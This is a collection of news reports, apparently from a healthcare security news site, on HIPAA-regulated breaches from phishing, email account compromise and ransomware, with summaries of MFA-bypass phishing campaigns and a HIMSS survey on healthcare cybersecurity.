Phishing Attacks and Unauthorized Email Account Access Reported by 6 HIPAA Regulated Entities

21,500-Record Data Breach Reported by Police Department of the City of New York

Unauthorized persons have gotten access to the Administrative Fund of the Detectives’ Endowment Association of the Police Department of the City of New York (NYCDEA) email system and possibly viewed or acquired the protected health information (PHI) of 21,544 persons.

Upon discovery of suspicious activity in its email system on December 16, 2021, NYCDEA changed passwords to stop continuing unauthorized access and engaged third-party cybersecurity specialists to look into the unauthorized activity. Based on the breach report submitted to the Maine Attorney General, an unauthorized third-party access to the email system and sensitive information was confirmed only on October 3, 2022. It is unknown why the confirmation of the breach took a very long time.

The evaluation of the breached email accounts showed they include data like names, addresses, dates of birth, driver’s license numbers, state ID card numbers, payment card details, financial account numbers, usernames and passwords, medical background, and medical insurance details. Notification letters were mailed to impacted persons on October 31, 2022. Credit monitoring, identity theft protection services and fraud consultation were provided to impacted persons.

Two Email Accounts Breach in Phishing Attack at Gateway Ambulatory Surgery Center

Gateway Ambulatory Surgery Center located in Concord, NC, has begun informing 18,479 patients that unauthorized individuals potentially accessed some of their PHI that was saved in email accounts. The medical center discovered the email account breach first on April 6, 2022. According to the third-party forensic investigation, unauthorized individuals accessed two employee email accounts from February 14, 2022 to May 10, 2022, because of employees clicking on phishing emails.

It was confirmed by Gateway on September 1, 2022 that the email accounts included patient data, such as names, health benefit enrollment data, medical background, medical insurance data, dates of service, and patient account numbers. The driver’s license numbers and/or Social Security numbers of some patients were likewise exposed. Gateway sent notification letters on October 31, 2022, and offered free credit monitoring, identity restoration, and fraud consultation services to qualified patients.

Gateway stated it has enforced a new endpoint detection and response program and has given extra security awareness training to its employees.

Two Email Accounts Breached at Assurance Health System

Assurance Health System based in Indianapolis, IN offers senior inpatient psychiatric care services in central Indiana and Ohio. It recently reported that unauthorized persons accessed the email accounts of two employees. It is uncertain when the provider detected the unauthorized email account activity; however, the forensic investigation affirmed that an unauthorized third party accessed one email account from April 8, 2022 to April 21, 2022, and had another unauthorized access from June 10, 2021 to March 8, 2022. The health system finished the analysis of the email accounts on September 1, 2022, and began sending notifications to the 3,565 impacted people on October 28, 2022.

The breached email accounts held the PHI of patients of Assurance Health, Brightwell Behavioral Health facilities, and Anew Health, which include names, contact details, driver’s license numbers, Social Security numbers, birth dates, patient account numbers, medical record numbers, dates of treatment, treatment facilities, medical background, condition and diagnosis data, provider names, prescription data, and medical insurance details.

Persons who had their driver’s license numbers or Social Security numbers exposed were offered free credit monitoring and identity protection services. Assurance Health System stated that it implemented extra safety measures and technical security procedures to further secure and keep track of its email system.

2,915 Patients of Native American Rehabilitation Association of the Northwest were Affected by Email Breach

Native American Rehabilitation Association of the Northwest (NARA NW) based in Portland, OR has submitted a breach report involving the email accounts of seven staff members. NARA NW detected suspicious activity inside its email system on September 1, 2022 and took quick action to stop continuing unauthorized access. The analysis of the impacted email accounts showed unauthorized access from August 31 to September 1 by a third party located outside America.

The email accounts included patient data such as names, birth dates, and non-sensitive treatment data. Four of the 2,915 impacted persons had their Social Security numbers compromised. Those persons were given free credit monitoring services for one year.

NARA NW stated it was ready for such incidents, and that it had the technology in place to immediately determine the particular emails and data that were accessed; nevertheless, additional safety measures have already been carried out, such as limiting the usage of cloud-based email, blocking access coming from beyond the United States, and using multi-factor authentication for email accounts.

Work Health Solutions Email Account Breach

Occupational healthcare provider Work Health Solutions in San Jose, CA recently reported that an unauthorized third party accessed an employee’s email account from February 16, 2022 to March 24, 2022. The provider immediately secured the email account and started a forensic investigation. The account evaluation that was conducted confirmed the potential breach of PHI on October 11, 2022. Full names, driver’s license numbers, Social Security numbers, medical insurance data, and/or medical data may have been compromised.

Work Health Solutions sent notification letters to impacted persons on November 9, 2022 and offered free credit monitoring services to those who had their Social Security numbers affected. The incident is not yet posted on the HHS’ Office for Civil Rights breach website, therefore it is presently uncertain how many persons were impacted.

Three Rivers Provider Network Reports Unauthorized Email Account Activity

Three Rivers Provider Network based in Las Vegas, NV recently announced an employee email account breach that affected sensitive patient data such as names, birth dates, addresses, passport numbers, Social Security numbers, state-issued ID numbers, driver’s license numbers, and health data.

The company detected the unauthorized activity on June 3, 2022, and confirmed on August 17, 2022 the exposure of PHI. No report of patient data misuse was received during the issuance of notifications. The affected individuals received notification letters on November 5, 2022 and offers of free credit monitoring services for 24 months.

Data Breaches at Main Line Women’s Healthcare, Fred Hutchinson Cancer Center, and Seton Medical Center Harker Heights

An ex-employee of Main Line Women’s Healthcare located in Bryn Mawr, PA, was found to be viewing and taking photos of patient data utilizing a personal mobile phone. The breach investigation reveals that the information of 804 OB/GYN practice patients was viewed and photographed.

As soon as the HIPAA violation was discovered, the worker was promptly suspended. The provider started an internal investigation to find out the magnitude of the privacy violation and the types of data obtained. The compromised records contained patient names, birth dates,
addresses, medical account numbers, insurance companies, treating doctors, prescription drugs, and diagnoses.

The employee’s work at Main Line Women’s Healthcare was from February 7, 2022 to June 14, 2022, which is now over as a result of the HIPAA breach. A representative for Main Line Women’s Healthcare stated it cannot ascertain the employee’s reasons, nor if the copied data was improperly used or further exposed. The privacy breach report was submitted to the police and Main Line Women’s Healthcare is helping with the investigation.

The provider finished the analysis of the data on September 7, 2022, and sent notification letters on October 10. The late issuance of notification letters was because of the time used to get updated contact details. Free credit monitoring services were provided to impacted persons.

Email Account Breach at Fred Hutchinson Cancer Center, WA

Fred Hutchinson Cancer Center located in Seattle, WA, previously called Seattle Cancer Care Alliance, has found out that an unauthorized person had accessed a staff email account. The incident was discovered on March 26, 2022, upon noticing suspicious activity in the email account. After securing the email account immediately, the center started a forensic investigation to find out the nature and extent of the data breach.

Fred Hutchinson Cancer Center uncovered on April 18, 2022, that an unauthorized individual accessed the email account from March 25 to March 26, 2022. A team was created to review all the documents contained in the account and find out how many persons were impacted and the types of data that were viewed. That process was finished on September 9, 2022, and since contact details had been updated, the center began sending notification letters. The types of data compromised were different from one patient to another but might have contained names, addresses, financial account details, Social Security numbers, medical data, and/or medical insurance data. Fred Hutchinson Cancer Center stated it is not aware of any improper use of patient data.

Any person whose Social Security or government ID number had been exposed will be eligible to receive one-year free credit monitoring and identity theft protection services. The incident is not yet posted on the HHS’ Office for Civil Rights breach website, therefore, the number of affected persons is presently uncertain.

Phishing Attack at Seton Medical Center Harker Heights

HH Killeen Health System, which manages Seton Medical Center Harker Heights based in Texas, has begun informing 15,056 patients about the potential exposure and theft of some of their PHI by unauthorized persons.

The breach happened at a vendor employed by Seton Medical Center Harker Heights. Unauthorized individuals accessed the email accounts of two employees after the employees made a response to phishing emails. The medical center immediately secured the accounts to stop further unauthorized access. It conducted a forensic investigation to find out the scope of the breach. Based on the notification letter given to the Texas Attorney General, the attackers acquired access to the names and medical data of patients.

Evernote Phishing Campaign Targets Healthcare Companies

There is a malicious phishing campaign discovered that targets healthcare companies. The emails sent employ an Evernote-themed bait to fool recipients into accessing a Trojan file that creates a log in prompt to steal information.

The Health Information Cybersecurity Coordination Center (HC3) just released an advisory concerning the campaign that has targeted a number of healthcare companies in the U.S. The malicious emails sent to targeted companies have a malicious URL that leads to an Evernote-themed webpage. The phishing emails are customized and the baits employed may differ; nonetheless, the emails noticed by HC3 include the subject “[Name of Organization] [Date] Business Review” and contain a Secure Message motif.

The URL provided in the email message takes the recipient to the Evernote website, where they are advised to save an HTML file – named message (3).html. The file contains JavaScript code that makes an Adobe or Microsoft-designed page to try to collect Outlook, AOL, IONOS, as well as other credentials.

After acquiring credentials via phishing campaigns like this, cyber threat actors will be able to access email accounts that can have substantial amounts of sensitive information, such as protected health information (PHI). Affected email accounts may be employed to perform phishing attacks internally and could allow threat actors to gain a foothold to perform more significant attacks on the company. A lot of ransomware attacks begin by sending phishing emails.

Ways to safeguard against phishing attacks include a mix of measures, such as email security tools for stopping phishing emails, web filters for hindering access to malicious sites that prompt malware download, antivirus software programs that recognize Trojans as well as other malicious code, and multifactor authentication to prevent unauthorized access to the email system. It is also crucial to give the workforce frequent security awareness training regarding phishing threats and teach employees to identify phishing emails.

Additional data on this phishing campaign, together with other suggested mitigations, are available in the HC3 security advisory.

Data Breaches Reported by St. Luke’s Health System, Allegheny Health Network, Central Maine Medical Center, and Granbury Eye Clinic

St. Luke’s Health System based in Boise, ID, has just submitted a data breach report to the HHS’ Office for Civil Rights that impacted 31,579 individuals. The breach took place in May 2022 at Kaye-Smith, which is a billing vendor of the company. The patients invoiced that month were impacted by the incident. Kaye-Smith learned about the breach in June 2022 and informed St. Luke’s Health System on July 6, 2022.

Unauthorized people got access to the network at Kaye-Smith, which comprised data including patient names, insured names, telephone numbers, addresses, ID numbers, dates of birth, services descriptions, amounts invoiced, payment due dates, outstanding bills, status of accounts, and Social Security numbers. The FBI is helping Kaye-Smith look into the breach to better know how the breach took place.

St. Luke’s Health System mentioned it terminated its association with the billing provider. The investigation at this point has not found any information that indicates patient information misuse. Impacted persons got a free credit monitoring service membership.

Allegheny Health Network Phishing Attack Impacts 1000s of Patients

Allegheny Health Network located in Pennsylvania has lately confirmed that an unauthorized third party viewed the email account of a worker after responding to a phishing email. On May 31, 2022, the worker responded to the email message and the breach was noticed the next day.

An analysis of the email account affirmed that PHI like names, birth dates, dates of medical services, medical backgrounds, health ailments, diagnoses and treatment data, and driver’s license numbers is held in the account. A part of the patients additionally had their Social Security number and/or financial details compromised.

Allegheny Health Network stated immediate action was undertaken to handle the occurrence, such as executing a password reset to avert more unauthorized access. A third-party cybersecurity agency has additionally aided to strengthen its security settings.

Allegheny Health Network has sent the breach report to the HHS’ Office for Civil Rights having a placeholder of 500 records until finally the breach is completely investigated and the number of people affected is identified. The local press has mentioned approximately 8,000 persons were impacted.

Central Maine Medical Center Impacted by Data Breach at Shields Healthcare Group

Central Maine Medical Center (CMMC) has affirmed the impact of a data breach at Shields Healthcare Group on its organization. Of the 56 facility partners that were impacted by the breach, CMMC was one of the impacted. Approximately 2 million persons were affected, which include 11,938 patients of CMMC.

Granbury Eye Clinic Located in Texas Affected by Data Breach at Eye Care Leaders

Granbury Eye Clinic located in Texas is the most recent eye care company to affirm being impacted by the Eye Care Leaders data breach, which affected the PHI of 16, 475 individuals. The data breach is currently identified to have impacted a minimum of 39 eye care companies, along with 3,091,694 patients.

More than 10,000 Companies Attacked in Ongoing MFA-Bypassing Phishing and BEC Campaign

Microsoft gave a warning about a big phishing campaign aimed at Office 365 credentials that circumvents multi-factor authentication (MFA). The campaign is happening now and over 10,000 companies were targeted by attackers in the last 10 months.

According to a report by Microsoft, one of the phishing campaigns used emails that include HTML file attachments. The email tells the user that he/she received a Microsoft voicemail message. The HTML file needed to be opened in order to see the message. The HTML file behaves as a gatekeeper, making sure the targeted user goes to the URL after being redirected from the file attachment.

The user is taken to a web page that has a known open source phishing set, which is utilized to collect credentials. The user is prompted to log in to their Microsoft account to be able to access the voicemail. After signing in, the user is told that an MP3 voicemail message will be sent as an attachment to an email message within an hour. The email address of the user is auto-filled into the sign-in window, only the password needs to be inputted by the user.

This campaign is known as an adversary-in-the-middle (AiTM) phishing attack. The phishing site is placed between the targeted user and the real site they are supposed to log into. Two distinct Transport Layer Security (TLS) sessions are utilized, one is between the user and the attacker and the other is between the attacker and the real site.

After entering the credentials on the attacker-controlled page, they are directed to the real web page. The information from the real resource is handed to the attacker, which is then passed on to the user. Aside from collecting credentials, session cookies are ripped off. The session cookie is used on the browser to bypass the authentication procedure, which works even though multi-factor authentication is activated. The phishing kit makes the whole process automatic.

As soon as the attacker got access to the Office 365 email of the user, the messages inside the account are viewed to determine possible targets for the following stage of the phishing attack. The attacker subsequently creates mailbox protocols that tag selected messages as read and transfers them to the archive to keep the user from finding out about the compromise of their mailbox. Afterward, the attacker conducts a business email compromise (BEC) scam on the targets.

Message posts are hijacked, and the attacker adds their own information to try to obtain the targeted individual to send a fake wire transfer to the attacker’s account. Because the emails are responses to earlier messages, the recipient is likely to think they are in real communication with the account owner, when they are just conversing with the attacker.

Microsoft stated it takes less than five minutes after stealing the credentials and session cookies to send the first BEC email. With all responses to the request being archived automatically, the attacker can just look at the archive for any responses and does this every couple of hours. They are additionally able to find more prospective targets to perform BEC scams on. Although the account breach is programmed, the BEC attacks seem to be done manually. Any email messages sent or gotten are one by one erased from the archive and sent folder to steer clear of discovery. BEC attacks like this can entail bogus transactions of up to millions of dollars.

Protecting against these attacks demands advanced email security options that check incoming and outgoing email messages and can likewise prohibit access to malicious web pages, for instance, an email security program and a DNS filter. Microsoft additionally suggests employing conditional access guidelines that restrict account access to particular gadgets or IP addresses. Microsoft additionally advises continually checking emails for shady or anomalous activities, for example, log-in attempts along with suspicious elements.

With regard to the bypass of MFA, Microsoft highlights that although AiTM attacks could avoid MFA, MFA is still an essential security step and is useful for preventing a lot of threats. Microsoft recommends making MFA usage “phish-resistant” by making use of programs with Fast ID Online (FIDO) v2.0 as well as certificate-based authentication.

Security Breaches at Atrium Health and Heartland Healthcare Services Reported

Patient Data Likely Exposed in Atrium Health Phishing Attack

Atrium Health based in Charlotte, NC reported a phishing incident that compromised the protected health information (PHI) of 6,695 individuals who received services from Atrium Health at Home. A staff member clicked a link in a phishing email on April 7, 2022 and exposed the credentials for an email account. Atrium Health detected the breach on April 8 and blocked the unauthorized access right away.

From April 7 to April 8, the unauthorized third party utilized the account for sending other phishing emails, which indicates that acquiring patient data saved in the account wasn’t the purpose of the phishing attack, though it cannot be determined whether any patient data was seen or acquired.

An analysis of the email messages and file attachments within the account showed they included patients’ complete names, residential addresses, dates of birth, medical insurance data, and medical data (including medical record number, service dates, facility and provider and/or diagnosis and treatment details). The financial account data, Social Security numbers, and/or driver’s license/state ID numbers of some persons were also exposed. Atrium Health stated there were no reported instances of patient data misuse.

Affected persons received breach notification letters. Those who had either their Social Security number, driver’s license number, or financial account information exposed received free credit monitoring and identity theft protection services. Security measures have been improved and Atrium Health stated it will still give its employees regular phishing training.

Patient Data Theft Due to Heartland Healthcare Services Ransomware Attack

Heartland Healthcare Services based in Toledo, OH, has reported the exfiltration of files that contain patient information from its system during a ransomware attack in April 2022. The attack was discovered on April 11 when the employees could not access files on its system.

Heartland Healthcare Services mentioned that the attacker issued a ransom demand, however, after contacting the Federal Bureau of Investigation, it made the decision not to give the ransom payment. Part of the stolen data was uploaded to the dark web data leak website of the ransomware group.

A review of the impacted files showed they included the PHI of 2,763 individuals who got medicines via Heartland Healthcare Services, which include Heartland Pharmacy of Pennsylvania, Heartland Pharmacy of Illinois, or Heartland Pharmacy of Maryland. The stolen information contained names, phone numbers, addresses, medicine names, and other medication-associated data.

Heartland Healthcare Services claimed it has toughened its security procedures to stop the same attacks later on.

Spokane Regional Health District and Catholic Health Announce Data Breaches

Spokane Regional Health District (SRHD) located in Washington encountered once again a phishing attack. This is the second time this year, the health district has reported the potential compromise of patient data after a staff responded to a phishing email.

SRHD announced on March 24, 2022 that its IT unit identified a compromised email account. The investigation just confirmed that a staff replied to a phishing email on February 24, 2022, and subsequently shared credentials that enabled the account to be accessed. Last week, SRHD stated that the email account stored the protected health information (PHI) of 1,260 people. An unauthorized individual may have ‘previewed’ that data, although there was no evidence obtained that suggests the access or download of information.

Content in the account were names, birth dates, service dates, source of referral, healthcare provider name, diagnosing status, whether the patient was located, date placed, patient risk level, staging level, how medicines were obtained, test type, test result, treatment details, medication data, delivery dates and any remedies offered to the baby, diagnostic data, medical details, and client notes.

An SRHD spokesperson stated corrective measures were taken to mitigate the current incident and avoid further phishing attacks, such as reinforcing worker cybersecurity training, employing multifactor authentication, and carrying out testing on its systems.

Similar to the other parts of the state of Washington, SRHD has encountered a record-level surge in phishing emails as well as malware installation attempts. In this incident, staff members fell victim to a phishing scam that exposed confidential data to data thieves. SRHD Deputy Administrative Officer Lola Phillips expressed their strong dedication to protecting personal data and minimizing the possibility of future attacks.

On January 24, 2022, SRHD reported the compromise of an employee email account on December 21, 2021. The email account comprised the sensitive information of 1,058 persons, which include names, dates of birth, counselor names, case numbers, test findings and dates of urinalysis, medicines, and date of the last dose.

Subsequent to that attack, SRHD mentioned it will be enhancing worker cybersecurity training, using multifactor authentication, and doing tests on its systems.

Catholic Health Informs Patients Regarding Data Theft at a Business Associate

Catholic Health has lately begun informing roughly 1,300 patients concerning the exposure of some of their PHI in a cyberattack encountered by Ciox Health, its business associate.

Ciox Health based in Buffalo, NY offers health data management services to hospitals and insurance companies. From June 24, 2021 to July 2, 2021, emails and file attachments in the email account of a Ciox Health worker had been downloaded by an unauthorized person.

The breach was noticed last year and Ciox Health learned in September 2021 that the email account comprised patient data associated with billing queries and customer support requests. An assessment of the data within the account was done at the beginning of November and impacted healthcare providers and insurance companies were informed from November 23 to December 30, 2021.

Catholic Health stated the breached data included names of patients, healthcare provider names, birth dates, dates of service, medical insurance details, and/or medical record numbers. Although Ciox’s investigation didn’t uncover any cases of fraud or identity theft because of this incident, as a safety precaution, Ciox is informing impacted Catholic Health patients.

HIMSS Cybersecurity Survey Reveals the Human Factor is the Biggest Vulnerability in Healthcare

HIMSS has released the results of its 2021 Healthcare Cybersecurity Survey which revealed that 67% of respondents have had at least one significant security event in the past 12 months, with the biggest security breaches the consequence of phishing attacks.

The 2021 HIMSS Healthcare Cybersecurity Survey was performed on 167 healthcare cybersecurity specialists, who had at least some accountability for daily cybersecurity operations or oversight.

The surveyed IT experts were questioned concerning the major security breaches they had encountered in the last 12 months, and in 45% of instances it was a phishing attack, and 57% of survey participants stated the most significant breach involved phishing. Phishing attacks are most frequently carried out through email. 71% of the most significant security incidents are email-based phishing attacks; nonetheless, 27% mentioned there was a significant voice phishing incident (vishing), 21% stated they had many SMS phishing incidents (smishing), and 16% mentioned there were many social media phishing incidents.

Phishing was the most frequent preliminary point of compromise, accounting for 71% of the most critical security breaches. Next are social engineering attacks at 15%. Human error is often the reason for critical data breaches, making up 19% of the major security breaches, with 15% due to the extended use of legacy software for which support is not provided anymore. The survey additionally showed fundamental security controls were not completely implemented at many companies.

Ransomware attacks continue to trouble the medical care sector, and the attacks frequently result in major disruption and have huge mitigation costs. 17% of respondents reported the most critical security incident they experienced was a ransomware attack. 7% of survey participants stated negligent insider activity brought about the greatest security incident, although HIMSS remarks that healthcare firms frequently do not have strong defenses against insider breaches, thus it is likely that these kinds of breaches were underreported.

Considering the extent to which phishing results in account exposures or serious cyberattacks, it is essential for healthcare companies to employ effective email security measures to stop phishing emails and to additionally invest in security awareness training for the employees. Not just one security solution can prohibit all phishing attacks, therefore it is essential for the labor force to get training on how to recognize phishing and social engineering attacks. Training employees in security best practices can help to minimize human error which often causes data breaches.

The prolonged use of legacy systems once it’s the end-of-life can be a problem in healthcare, however, plans must be made to upgrade obsolete programs, and if that is not possible, mitigations ought to be used to make exploitation of vulnerabilities more difficult, for instance isolating legacy systems and not exposing them to the web.

44% of survey respondents stated their biggest breach had no negligible impact; nevertheless, 32% mentioned security breaches resulted in disruption to systems that impacted business functions, 26% said security breaches interrupted IT systems, and 22% reported security breaches led to data breaches or data leakage. 21% stated the security breaches had affected clinical care, and 17% mentioned the most critical security incident ended in financial loss.

In spite of the risk of cyberattacks, funds for cybersecurity budgets stay slim. 40% of surveyed IT specialists stated 6% or less of their IT budget was spent on cybersecurity, which is the same percent as the last four years even if the risk of attacks has grown. 40% of survey participants mentioned they either had funding that has not changed since last year or had diminished, and 35% stated their cybersecurity funding is not expected to change.

The HIMSS survey questioned respondents to learn about the biggest security problems, which for 47% of participants was inadequate budget. Staff compliance with policies and procedures was a big obstacle for 43% of respondents, the continuing use of legacy software programs was a problem for 39% of participants, and 34% stated they had trouble with patch and vulnerability management.

Workers making errors, identity and access management, device management, building a cybersecurity culture, data leaks, and shadow IT were likewise considered as big security issues.

The discoveries of the 2021 HIMSS Healthcare Cybersecurity Survey show that healthcare providers still have substantial difficulties to overcome. These obstacles to progress include limited security budgets, growing legacy footprints, and the increasing volume of cyber-attacks and compromises. Furthermore, standard security controls were not fully enforced at numerous organizations. Maybe the major vulnerability is the human factor. Healthcare companies ought to do more to support healthcare cybersecurity experts and their cybersecurity programs.

Newest Phishing Kits Used for Multi-Factor Authentication Bypass

Phishing attacks enable threat actors to acquire credentials, however, with multi-factor authentication (MFA), it is more difficult for phishing attacks to be successful. With MFA turned on, besides a username and password, one more method of authentication is required before granting account access. Microsoft has formerly stated multi-factor authentication hinders 99.9% of automated account compromise attacks. Nonetheless, MFA does not guarantee protection. A new kind of phishing kit is being used more and more to circumvent MFA.

Proofpoint Researchers revealed in a new blog article that phishing kits are currently being utilized that use a transparent reverse proxy (TRP), which facilitates browser man-in-the-middle (MitM) attacks. The phishing kits permit the attackers to expose browser sessions and steal credentials and session cookies in real-time, permitting full account control without giving a warning to the victim.

There are several phishing kits that can typically be purchased cheaply that enable the bypass of MFA; some are basic with no-extra functionality, while others are more advanced and include a few layers of obfuscation and include modules for doing a variety of functions, such as the theft of sensitive data such as passwords, credit card numbers, Social Security numbers, and MFA tokens.

With common phishing attacks, the attackers make a bogus login page to deceive visitors into sharing their credentials. Quite often the phishing page is a carbon copy of the website it impersonates, with the web address as the only indicator that the phishing page is not real. One MitM phishing kit discovered by the Proofpoint staff doesn’t utilize these bogus pages, instead, it utilizes TRP to present the legit landing page to the visitor. This strategy makes it difficult for victims to identify the phishing scam. As soon as a user visits the page and a request is transmitted to that service, Microsoft 365 for instance, the attackers record the username and password even before they are sent and snatch the session cookies that are transmitted in response in real-time.

The researchers pertain to the Stony Brook University and Palo Alto Networks’ review of MitM phishing kits, which found more than 1,200 phishing websites employing MitM phishing kits. Worryingly, these phishing web pages are frequently not discovered and blocked by security solutions. 43.7% of the domains and 18.9% of the IP addresses were not listed on common blocklists, for example, those managed by VirusTotal. Additionally, although regular phishing pages usually only have a lifespan of about 24 hours prior to being blacklisted, MitM phishing pages last a lot longer. 15% of those found lasted for longer than 20 days before being added to blocklists.

The usage of these phishing kits is growing, though fairly slowly. Proofpoint experts think that threat actors adopt MitM phishing kits a lot more widely in response to the greater use of MFA. MitM phishing kits are simple to set up, free to use, and have been confirmed effective at averting detection. The industry must be ready to handle blind spots like these before they can change in new unexpected directions.

PHI of 138,000 People Exposed Because of 3 Email Security Incidents

Hackers have acquired access to email accounts that contain protected health information (PHI) at Volunteers of America Southwest California, Injured Workers Pharmacy, and iRise Florida Spine and Joint Institute.

Injured Workers Pharmacy

Injured Workers Pharmacy based in Andover, MA has recently reported a data breach to the Maine Attorney General. The incident was discovered on or about May 11, 2021, upon seeing suspicious activity in an employee’s email account. The pharmacy immediately secured the email account and engaged third-party computer forensics professionals to investigate the attack. The investigation confirmed the compromise of 7 email accounts from January 16, 2021 to May 12, 2021.

Third-party data review experts were engaged to look at the emails and file attachments in the exposed accounts, which affirmed they included the PHI of 75,771 people like names, addresses, and Social Security numbers. Following the review, Injured Workers Pharmacy confirmed the results, and that process was finished on or approximately December 14, 2021. The pharmacy began sending notification letters to affected individuals on February 3, 2022.

Injured Workers Pharmacy mentioned it has augmented its email security measures and is giving some impacted persons complimentary credit monitoring and identity restoration services.

iRise Florida Spine and Joint Institute

The iRise Florida Spine and Joint Institute has found out a worker email account that contains the protected health information of 61,595 patients was accessed by an unauthorized individual. The forensic investigation revealed the hacker got access to the email account between February 24, 2021 and February 26, 2021.

A thorough assessment of email messages and attachments was performed, and the procedure was accomplished on November 22, 2021. iRise stated the following types of information were potentially viewed or obtained at the time of the attack: Names, dates of birth, diagnoses, clinical treatment data, physician and/or hospital name, dates of service, and health insurance details. The Social Security numbers, driver’s license numbers, financial account details, credit card numbers, and/or usernames and passwords of a few persons were likewise exposed.

Affected people were informed and a one-year membership to a credit monitoring service was offered for free to persons whose Social Security numbers were exposed. iRise has examined its email security procedures and has carried out extra technical safeguards, which include multifactor authentication. The workforce is also provided extra training on email security.

Volunteers of America Southwest California

The social service organization based in San Diego, CA Volunteers of America Southwest California, lately announced it encountered a phishing attack. A worker got an email that is like a voicemail message, that has a hyperlink to a web page that required the input of login information in order to listen to the message. The access credentials were captured and utilized to view the staff’s email account.

The attackers viewed the email account on or about November 16, 2021, and the attack was discovered and secured on November 16. An evaluation of the email account showed it comprised the first and last names of clients in most of the cases, with a number of the records at the same time including the COVID-19 vaccination status of individuals.

The breach appears to have been fully remediated and third-party specialists were employed to verify the containment steps. Email security was enhanced because of the breach.

The organization submitted the breach report to the HHS’ Office for Civil Rights indicating that 1,300 people were affected.

More than 30 Healthcare Providers Affected by CIOX Health Data Breach

The health information management services provider CIOX Health experienced a data breach that has affected no less than 32 healthcare providers. In July 2021, CIOX Health found out an unauthorized individual had acquired access to the email of a worker in the customer service team. The email account was promptly secured, with the following investigation affirming the email account was first accessed by an unauthorized person on June 24, 2021, with continuing access until the security breach was identified on July 2, 2021.

Based on the breach investigation by CIOX Health, it was confirmed that the incident was limited to just one staff email account. An audit of the data of the email account on September 24, 2021 revealed that it contained emails and file attachments that held the protected health information (PHI) of some of its healthcare provider clients for example names, dates of birth, provider names, dates of service, and the Social Security numbers, driver’s license numbers, health insurance data, and/or treatment details of a very limited number of people.

The worker in question worked in customer support and, therefore, assisted healthcare company clients throughout the country with billing problems and assisted with other customer service needs, therefore a substantial number of impacted clients. The staff did not, nevertheless, have access to the medical record systems of any of its healthcare provider clients.

CIOX Health stated that when the account was accessible it is likely that emails that contain protected health information were viewed or copied, however, there is no direct evidence of attempted or actual misuse of patient data found. CIOX Health is convinced that the email account was compromised to send out phishing email messages from the company domain to persons not related to CIOX Health.

CIOX Health is advising all people affected by the breach to take a look at their statements and explanation of benefits statements from their healthcare companies and insurance companies for any indication of unauthorized use of their information.

As a result of the breach, CIOX Health will implement stronger email security measures and will provide the workers with additional security awareness training.

On December 30, 2021, CIOX health started sending notifications to impacted healthcare company clients regarding the breach. Healthcare providers found to have been affected by the CIOX Health email account breach are the following:

Alabama Orthopaedic Specialists
AdventHealth in Orlando
Baptist Memorial Health Care
Butler Health Systems
Centra Health
Cameron Memorial Community Hospital
Children’s Healthcare of Atlanta
Copley Hospital
Coastal Family Health Center
DeSoto Memorial Hospital Health System
EvergreenHealth
Hospital Sisters Health System
Hoag Health System
Huntsville Hospital Health System
Indiana University Health
MD Partners
McLeod Health System
Niagara Falls Memorial Medical Center Health System
Northwestern Medicine
Northern Light Mercy Hospital
Ohio State University Health System
OrthoConnecticut
Prisma Health – Palmetto Health
Prisma Health – Greenville Health System
Sarasota County Public Hospital District d/b/a Sarasota Memorial Health Care System
Trinity Health – Mount Carmel Health System
Trinity Health – Holy Cross Hospital
Trinity Health – Saint Alphonsus Health System
Trinity Health – St. Joseph Mercy Health System
Trinity Health – St. Francis Medical Center
Union Hospital Healthcare System
Women’s Health Specialist

CIOX Health reported the security breach to the HHS’ Office for Civil Rights indicating that 12,493 individuals were impacted.

UH College of Optometry and Valley Mountain Regional Center Report Data Breaches

The University of Houston College of Optometry has found out that an unauthorized person not from the United States acquired access to an affiliated eye clinic’s networks and stole data included in the database of the clinic.

The Community Eye Clinic based in Fort Worth, TX, is managed by UH College of Optometry. The security team discovered the attack on September 13, 2021, a day after the breach happened. The IT security team promptly took action to protect the system, implemented additional defensive safety measures to better secure patient information, and enhanced its monitoring and notifications. The security team also reviewed the clinic’s IT guidelines and procedures to make sure that industry-standard protocols are implemented.

The attacker obtained files associated with patients who got services at the Community Eye Clinic from May 22, 2013, to September 13, 2021. The information in the database included names, birth dates, contact details, government ID numbers, medical insurance data, Social Security numbers, passport numbers, driver’s license numbers, diagnosis, and treatment details. There was no financial data kept in the database and the attack did not affect the University of Houston or College of Optometry network systems.

The 18,500 impacted persons were instructed to keep track of their explanation of benefits statements and account for hints of fraudulent transaction, to review their credit reports, and to put a security fraud notifier on their credit reports.

17,197 Patients Affected by Valley Mountain Regional Center Phishing Attack

Valley Mountain Regional Center (VMRC) based in Stockton, CA has begun informing 17,197 patients that unauthorized individuals accessed some of their protected health information (PHI) located in breached email accounts.

VMRC found phishing emails in its inboxes on September 15, 2021, and removed all the messages from its email accounts; nevertheless, the following investigation of the phishing attack showed that 14 workers had clicked the hyperlinks and shared credentials that permitted access to their email accounts.

A thorough analysis of the contents of the impacted inboxes affirmed they included names, addresses, birth dates, state-given client identifier numbers, phone numbers, individual e-mail addresses, diagnoses, prescription drugs, dates of service, and other unique identifiers.

VMRC stated no proof was found that suggests the attacker accessed, obtained, or misused any data in the email accounts; nevertheless, impacted individuals were instructed to keep track of their accounts and credit reports for strange transactions.

Data Breaches Suffered by PracticeMax and UMass Memorial Health

Anthem health plan members who have End-Stage Kidney Disease and are signed up in the VillageHealth program were notified about the potential compromise of some of their protected health information (PHI) during a ransomware attack.

VillageHealth assists Anthem plan members through coordinating care between the dialysis center, nephrologists, and healthcare providers and shares the results with Anthem through its vendor, PracticeMax.

PracticeMax provides business management and information technology solutions to healthcare companies. It identified the attack on May 1, 2021. According to the investigation, the attackers obtained access to its systems on April 17, 2021, and had continuing access possibly until May 5, 2021. PracticeMax mentioned it obtain back the access to its IT systems on the following day.

A forensic analysis of the attack affirmed that it affected one server that held protected health information (PHI) and the attackers may have accessed and acquired them.

The investigation into the incident finished on August 19, 2021, and established the exposure of the following types of data: First and last name, address, date of birth, phone number, Anthem member ID number, and clinical information associated with kidney care services obtained. There were no compromised financial details or Social Security numbers.

PracticeMax states it has performed an evaluation of its policies and protocols and has applied extra safeguards to prevent future attacks, which include rebuilding systems, utilizing more endpoint security solutions, and improving its firewalls. Affected individuals were provided complimentary credit monitoring services for 24 months.

UMass Memorial Health Notifies Patients With Regards to Phishing Attack

UMass Memorial Health has found out that unauthorized persons obtained access to some employees’ email accounts due to responding to phishing emails. The phishing attack was identified on August 25, 2021 upon noticing suspicious activity in its email environment.

UMass blocked authorized access to the email accounts right away and launched a forensic investigation, with support given by a third-party computer forensics company. The investigation affirmed the breach of the email accounts from June 24, 2020 until January 7, 2021, and in the course of that time, the unauthorized individuals got access to PHI stored in the email accounts.

